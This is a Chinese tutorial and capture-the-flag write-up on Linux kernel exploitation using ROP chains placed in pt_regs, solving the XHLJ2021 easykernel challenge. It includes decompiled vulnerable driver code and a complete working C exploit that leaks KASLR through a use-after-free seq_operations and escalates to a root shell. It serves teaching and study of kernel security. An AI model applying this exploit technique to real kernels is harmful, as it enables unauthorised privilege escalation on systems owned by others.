利用 pt_regs 构造通用内核 ROP¶

系统调用与 pt_regs 结构体¶

系统调用的本质是什么？或许不少人都能够答得上来：我们在用户态布置好相应的参数后执行 syscall 这一汇编指令，CPU 随即切换到内核态并跳转到 MSR_LSTAR 寄存器所指向的入口，即内核中的 entry_SYSCALL_64 这一函数，随后通过系统调用表跳转到对应的函数。

现在让我们将目光放到 entry_SYSCALL_64 这一用汇编写的函数内部，注意到当程序进入到内核态时，该函数会将所有的寄存器压入内核栈上，形成一个 pt_regs 结构体，该结构体实质上位于内核栈底，定义如下：

/*
 * struct pt_regs - user register frame saved on the kernel stack on kernel
 * entry.
 *
 * Members are declared from the lowest address (r15) to the highest (ss), so
 * the iretq return frame is the part closest to the top of the stack page.
 */
struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

内核栈与通用 ROP¶

我们都知道，内核栈的大小是固定的（x86-64 下默认为 16KB，即 4 个页面），而 pt_regs 结构体则固定位于内核栈栈底，因此当我们通过劫持内核结构体中的某个函数指针（例如 seq_operations->start）来劫持内核执行流时，rsp 与栈底的相对偏移通常是不变的。

而在系统调用过程当中有很多的寄存器其实是不一定能用上的，比如 r8 ~ r15，这些寄存器为我们布置 ROP 链提供了可能，我们不难想到：

只需要寻找到一条形如 "add rsp, val ; ret" 的 gadget 便能够完成 ROP

这里笔者给出一个通用的 ROP 板子，方便调试时观察：

/*
 * Debugging template: load an easily recognizable marker into every register
 * that ends up in pt_regs, then issue the syscall so that each slot can be
 * identified on the kernel stack.
 */
asm volatile(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0x88888888;"
    "mov r8,    0x99999999;"
    "xor rax,   rax;"         // rax = 0: syscall number (read on x86-64)
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   8;"           // third argument: byte count
    "mov rsi,   rsp;"         // second argument: destination buffer (current stack)
    "mov rdi,   seq_fd;"  // first argument: assumes the hijack is triggered through seq_operations->start
    "syscall"
);

新版本内核对抗利用 pt_regs 进行攻击的办法¶

正所谓魔高一尺道高一丈，内核主线在这个 commit 中为系统调用栈添加了一个偏移值，这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值：

diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
 #ifdef CONFIG_X86_64
 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
 {
+    add_random_kstack_offset();
     nr = syscall_enter_from_user_mode(regs, nr);

     instrumentation_begin();

当然，若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下，仍然可以通过布置一些 slide gadget 来继续完成利用，不过稳定性也大幅下降了。

例题：西湖论剑2021线上初赛 - easykernel¶

题目附件可在 https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/XHLJ2021-easykernel 下载。

分析¶

首先查看启动脚本，可以发现开启了 SMEP 和 KASLR：

#!/bin/sh

# Boot the challenge kernel (bzImage + rootfs.img) under QEMU.
# Mitigations visible on this command line: SMEP ("+smep" in -cpu) and
# KASLR ("kaslr" on the kernel command line passed via -append).
qemu-system-x86_64  \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"

进入题目环境，查看 /sys/devices/system/cpu/vulnerabilities/*，可以发现开启了 PTI （页表隔离）：

/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected

题目给了个 test.ko，拖入 IDA 进行分析，发现只定义了 ioctl，可以看出是常见的“菜单堆”题目，给出了分配、释放、读、写 object 的功能。对于分配 object，我们需要传入如下形式结构体：

/* Argument of the allocate request (ioctl 0x20). */
struct
{
    size_t size;    /* number of bytes to allocate and to copy in from buf */
    void *buf;      /* user-space buffer holding the initial contents */
};

对于释放、读、写 object，则需要传入如下形式结构体：

/*
 * Argument shared by the free (0x30), read (0x40) and write (0x50) requests.
 * The free request only copies the first 8 bytes, i.e. idx.
 */
struct 
{
    size_t idx;     /* index of the target object in the module's addrList */
    size_t size;    /* number of bytes to read or write */
    void *buf;      /* user-space buffer: destination for read, source for write */
};

分配：0x20¶

比较常规的 kmalloc，没有限制 size，最多可以分配 0x20 个 chunk：

 v7 = _kmalloc(v12, 3264LL);
  v8 = v7;
  if ( !v7 )
    return 0LL;
  v9 = v12;
  v10 = v13;
  if ( v12 > 0x7FFFFFFF )
    goto LABEL_29;
  _check_object_size(v7, v12, 0LL);
  v11 = copy_from_user(v8, v10, v9);
  if ( v11 )
    return 0LL;
  while ( addrList[v11] )
  {
    if ( ++v11 == 32 )
      return 0LL;
  }
  addrList[(int)v11] = v8;
  return 0LL;
}

释放：0x30¶

kfree 以后没有清空指针，直接就有一个裸的 UAF 糊脸：

  if ( a2 != 32 )
  {
    if ( a2 != 48 )
      return result;
    if ( !copy_from_user(&v12, v2, 8LL) )
    {
      if ( (unsigned int)v12 <= 0x20 )
      {
        if ( addrList[(unsigned int)v12] )
          kfree();
      }
      return 0LL;
    }
    return -22LL;
  }

读：0x40¶

会调用 show 函数：

  if ( a2 == 64 )
  {
    if ( !copy_from_user(&v12, v2, 24LL) )
    {
      show(&v12);
      return 0LL;
    }
    return -22LL;
  }

其实就是套了一层皮的读 object 内容，加了 hardened usercopy 检查：

/*
 * show - handler behind the read request (ioctl 0x40), as decompiled by IDA.
 *
 * a1 points to three 64-bit words: a1[0] is the object index, a1[1] the byte
 * count and a1[2] the user-space destination address.
 *
 * Returns 0xFFFFFFFF when the index is above 0x20 or the slot is empty,
 * 0xFFFFFFEA (-22 as a 32-bit value) when copy_to_user() reports a failure,
 * and 0 otherwise.
 */
__int64 __fastcall show(_QWORD *a1)
{
  const void *v1; // rsi
  unsigned __int64 v2; // r13
  __int64 v3; // r14
  _QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF

  _fentry__();
  // v5[32] lies right after the 0x100-byte bounce area; presumably the stack
  // canary read from gs:0x28 -- confirm against the disassembly.
  v5[32] = __readgsqword(0x28u);
  // Together these two statements zero the first 0x100 bytes of v5.
  v5[0] = 0LL;
  memset(&v5[1], 0, 0xF8uLL);
  // Only the low 32 bits of the index are examined, and 0x20 itself passes.
  // NOTE(review): the allocation loop gives up after 32 slots, so index 0x20
  // may be one past the end of addrList -- confirm the array size.
  if ( (unsigned int)*a1 > 0x20 )
    return 0xFFFFFFFFLL;
  v1 = (const void *)addrList[(unsigned int)*a1];
  if ( !v1 )
    return 0xFFFFFFFFLL;
  v2 = a1[1];
  v3 = a1[2];
  // Always copies 0x100 bytes out of the object, whatever size it was
  // allocated with.
  qmemcpy(v5, v1, 0x100uLL);
  // The requested length may not exceed the 0x100-byte bounce area.
  if ( v2 > 0x100 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
    BUG();
  }
  _check_object_size(v5, v2, 1LL);
  return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}

写：0x50¶

常规的写入 object：

  if ( a2 > 0x40 )
  {
    if ( a2 == 80 )
    {
      if ( copy_from_user(&v12, v2, 24LL) )
        return -22LL;
      if ( (unsigned int)v12 <= 0x20 )
      {
        v4 = addrList[(unsigned int)v12];
        if ( v4 )
        {
          v5 = v13;
          v6 = v14;
          if ( v13 <= 0x7FFFFFFF )
          {
            _check_object_size(addrList[(unsigned int)v12], v13, 0LL);
            copy_from_user(v4, v6, v5);
            return 0LL;
          }
LABEL_29:
          BUG();
        }
      }
    }
    return 0LL;
  }

解法：UAF + seq_operations + pt_regs + ROP¶

既然我们有一个直接的大小不限的 UAF 漏洞，那么解法就是多种多样的了。我们首先考虑如何劫持内核执行流，我们不难想到的是各种动态分配的函数表，例如 seq_operations 这个结构体便从 kmalloc-32 中动态分配：

当我们打开一个 stat 文件时（如 /proc/self/stat ）便会在内核空间中分配一个 seq_operations 结构体，该结构体定义于 /include/linux/seq_file.h 当中，只定义了四个函数指针，如下：

/*
 * Operation table used by seq_file: four function pointers and nothing else.
 * seq_read_iter() reaches it through m->op and calls ->start.
 */
struct seq_operations {
    /* first member; invoked as m->op->start(m, &m->index) by seq_read_iter() */
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

当我们 read 一个 stat 文件时，内核会调用其 proc_ops 的 proc_read_iter 指针，其默认值为 seq_read_iter() 函数，定义于 fs/seq_file.c 中，注意到有如下逻辑：

ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    struct seq_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

即其会调用 seq_operations 中的 start 函数指针，那么我们只需要控制 seq_operations->start 后再读取对应 stat 文件便能控制内核执行流。

控制了内核执行流之后，我们来看如何进一步进行提权，不难想到的是我们可以在 pt_regs 上布置 ROP chain，之后直接使用形如 add rsp, val ; ret 的 gadget 便能完成 ROP。需要注意的是 KPTI 是开启的，因此我们最后需要使用 swapgs_restore_regs_and_return_to_usermode 函数返回用户态。

最终的 exp 如下：

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/ioctl.h>

/**
 * Kernel Pwn Infrastructures
**/

/*
 * Wrap a string literal in ANSI SGR escape sequences: colour (32 green,
 * 34 blue, 31 red) plus bold (1) in front, reset (0) behind. msg has to be a
 * string literal because it is joined to the neighbours by literal
 * concatenation.
 */
#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

/* Print the coloured message on stdout; puts() appends the newline. */
#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

/**
 * err_exit - report a fatal error and terminate the process.
 * @msg: description of the failing step; only read, never modified
 *
 * Prints the message, waits five seconds so that it can be read before the
 * environment goes away, then exits with EXIT_FAILURE. Does not return.
**/
void err_exit(const char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Run-time (KASLR-adjusted) kernel addresses, filled in by exploitation().
 * swapgs_restore_regs_and_return_to_usermode, init_cred, pop_rdi_ret and
 * commit_creds are referenced by name from the inline assembly in
 * exploitation(), so their names must stay exactly as they are.
 */
size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;
/* kernel_base starts at the address used when the KASLR offset is 0;
 * kernel_offset is the leaked pointer minus its static address. */
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t commit_creds;
/* address written over the first pointer of the UAF'ed seq_operations */
size_t gadget;

/**
 * get_root_shell - verify that the process is root and hand over a shell.
 *
 * Never returns: the process exits with EXIT_FAILURE when the uid is still
 * non-zero, and with EXIT_SUCCESS once the spawned shell terminates.
**/
void get_root_shell(void)
{
    const int is_root = (getuid() == 0);

    if (!is_root) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");
    system("/bin/sh");

    /* Terminate here instead of returning to the caller, which could
     * otherwise end in a segmentation fault. */
    exit(EXIT_SUCCESS);
}

/**
 * Challenge Interface
**/

/* ioctl argument used by delete_chunk(), read_chunk() and write_chunk(). */
struct chal_karg_type1 {
    size_t  idx;    /* index of the target object */
    size_t  size;   /* number of bytes to transfer (left 0 by delete_chunk) */
    void    *buf;   /* user-space buffer (left NULL by delete_chunk) */
};

/* ioctl argument used by alloc_chunk(). */
struct chal_karg_type2 {
    size_t  size;   /* size of the object to allocate */
    void    *buf;   /* user-space buffer with the initial contents */
};

/**
 * alloc_chunk - ask the challenge module to allocate a new object.
 * @dev_fd: file descriptor of the opened challenge device
 * @size:   number of bytes to allocate and to copy in from @buf
 * @buf:    user-space buffer providing the initial contents
 *
 * Issues ioctl request 0x20. A failing ioctl() is reported on stderr instead
 * of being dropped silently; the function still returns normally.
**/
void alloc_chunk(long dev_fd, size_t size, void *buf)
{
    struct chal_karg_type2 arg = {
        .size = size,
        .buf = buf,
    };

    if (ioctl(dev_fd, 0x20, &arg) < 0) {
        perror("alloc_chunk: ioctl(0x20)");
    }
}

/**
 * delete_chunk - ask the challenge module to free an object.
 * @dev_fd: file descriptor of the opened challenge device
 * @idx:    index of the object to free
 *
 * Issues ioctl request 0x30; the size and buf members of the argument stay
 * zero. A failing ioctl() is reported on stderr instead of being dropped
 * silently; the function still returns normally.
**/
void delete_chunk(long dev_fd, size_t idx)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
    };

    if (ioctl(dev_fd, 0x30, &arg) < 0) {
        perror("delete_chunk: ioctl(0x30)");
    }
}

/**
 * read_chunk - read the contents of an object back to user space.
 * @dev_fd: file descriptor of the opened challenge device
 * @idx:    index of the object to read
 * @size:   number of bytes to copy out
 * @buf:    user-space destination buffer, at least @size bytes long
 *
 * Issues ioctl request 0x40. A failing ioctl() is reported on stderr instead
 * of being dropped silently; the function still returns normally.
**/
void read_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    if (ioctl(dev_fd, 0x40, &arg) < 0) {
        perror("read_chunk: ioctl(0x40)");
    }
}

/**
 * write_chunk - overwrite the contents of an object from user space.
 * @dev_fd: file descriptor of the opened challenge device
 * @idx:    index of the object to write
 * @size:   number of bytes to copy in
 * @buf:    user-space source buffer, at least @size bytes long
 *
 * Issues ioctl request 0x50. A failing ioctl() is reported on stderr instead
 * of being dropped silently; the function still returns normally.
**/
void write_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    if (ioctl(dev_fd, 0x50, &arg) < 0) {
        perror("write_chunk: ioctl(0x50)");
    }
}

/**
 * Exploitation
**/

/*
 * Static addresses of the kernel symbols/gadgets used by the exploit, i.e.
 * their values before kernel_offset is added in exploitation().
 * SEQ_OPS_0 is the static value of the first pointer read back from the
 * UAF'ed seq_operations; the leak minus SEQ_OPS_0 gives the KASLR offset.
 */
#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30

/* Scratch buffer exchanged with the module through the chunk helpers. */
size_t buf[0x100];
/* fd of /proc/self/stat; referenced by name from the inline assembly in
 * exploitation(), so the name must not change. */
int seq_fd;

/**
 * exploitation - leak the KASLR offset through a UAF'ed seq_operations, then
 * overwrite seq_operations->start and pivot into a ROP chain laid out in
 * pt_regs.
 *
 * Does not return: get_root_shell() terminates the process, and every setup
 * failure ends in err_exit().
 *
 * NOTE(review): the inline assembly uses Intel syntax and absolute symbol
 * references; presumably built with -masm=intel as a static, non-PIE binary --
 * confirm the build flags.
**/
void exploitation(void)
{
    int dev_fd;

    dev_fd = open("/dev/kerpwn", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/kerpwn file!");
    }

    log_info("[*] Allocating object and UAF as seq_operations...");

    /*
     * Allocate a 0x20-byte object (first free slot, i.e. index 0) and free it
     * right away; the module keeps the stale pointer. Opening a stat file is
     * then expected to place its seq_operations in the same memory.
     */
    alloc_chunk(dev_fd, 0x20, buf);
    delete_chunk(dev_fd, 0);
    seq_fd = open("/proc/self/stat", O_RDONLY);
    if (seq_fd < 0) {
        err_exit("FAILED to open the /proc/self/stat file!");
    }
    read_chunk(dev_fd, 0, 0x20, buf);

    /* buf[0] now holds seq_operations->start, a kernel text pointer. */
    kernel_offset = buf[0] - SEQ_OPS_0;
    kernel_base += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    /*
     * Stack-adjusting gadget that moves rsp into pt_regs.
     * NOTE(review): the annotation "add rsp, 0x40 ; ret" was attached to the
     * r13 line of the asm below; it presumably describes this address --
     * confirm against the kernel image.
     */
    gadget = 0xffffffff8135b0f6 + kernel_offset;

    printf(
        SUCCESS_MSG("[+] Got kernel base: ") "%zx"
        SUCCESS_MSG(" , kaslr offset: ") "%zx\n",
        kernel_base,
        kernel_offset
    );

    buf[0] = gadget; // seq_operations->start
    /*
     * Enter the return trampoline 9 bytes past its start.
     * NOTE(review): presumably skips the leading register-restore
     * instructions -- confirm against this kernel's disassembly.
     */
    swapgs_restore_regs_and_return_to_usermode += 9;
    write_chunk(dev_fd, 0, 0x20, buf);

    log_info("[*] Triggering evil seq_operations...");

    /*
     * read(seq_fd, rsp, 8): the kernel saves the registers below into pt_regs
     * on entry, then calls the overwritten ->start. The chain occupies the
     * r14, r13, r12 and rbp slots, in that order.
     */
    asm volatile(
        "mov r15, 0xbeefdead;" // marker value, easy to spot while debugging
        "mov r14, pop_rdi_ret;" // chain: pop rdi ; ret
        "mov r13, init_cred;" //   value popped into rdi
        "mov r12, commit_creds;" //   commit_creds(rdi)
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;" // back to user mode, iret(q)
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;" // syscall number 0
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov edi, seq_fd;" // seq_fd is a 4-byte int: 32-bit load, zero-extended into rdi
        "syscall"
    );

    /*
     * The asm statement declares no clobbers although it overwrites most
     * general-purpose registers; nothing below relies on register contents
     * and get_root_shell() never returns.
     */
    get_root_shell();
}

/**
 * Program entry point: runs the exploit. The command-line arguments and the
 * environment are not used.
**/
int main(int argc, char ** argv, char ** envp)
{
    (void)argc;
    (void)argv;
    (void)envp;

    exploitation();

    return 0;
}

Reference¶

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

https://arttnba3.cn/2021/11/29/PWN-0X02-LINUX-KERNEL-PWN-PART-II/